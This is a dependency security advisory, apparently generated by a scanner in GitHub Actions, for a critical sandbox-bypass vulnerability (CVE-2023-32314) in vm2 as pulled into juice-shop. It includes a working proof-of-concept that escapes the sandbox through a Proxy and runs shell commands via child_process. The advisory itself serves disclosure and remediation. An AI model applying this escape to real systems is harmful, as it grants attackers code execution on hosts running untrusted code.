Critical severity - Sandbox Bypass vulnerability in vm2 (package.json)

[github-actions]

• Package Manager: npm
• Vulnerable module: vm2
• Introduced through: juice-shop@12.3.0, juicy-chat-bot@0.6.6 and others

Detailed paths

• Introduced through: juice-shop@12.3.0 › juicy-chat-bot@0.6.6 › vm2@3.9.11

Overview

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.

Affected versions of this package are vulnerable to Sandbox Bypass by abusing an unexpected creation of a host object based on the maliciously crafted specification of Proxy.
Exploiting this vulnerability allows an attacker to gain remote code execution rights on the host running the sandbox via the Function constructor.

PoC

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo hacked").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

Remediation

Upgrade vm2 to version 3.9.18 or higher.

References

• GitHub Commit
• GitHub Gist
• GitHub Release
  
  SNYK-JS-VM2-5537100
  (CVE-2023-32314) vm2@3.9.11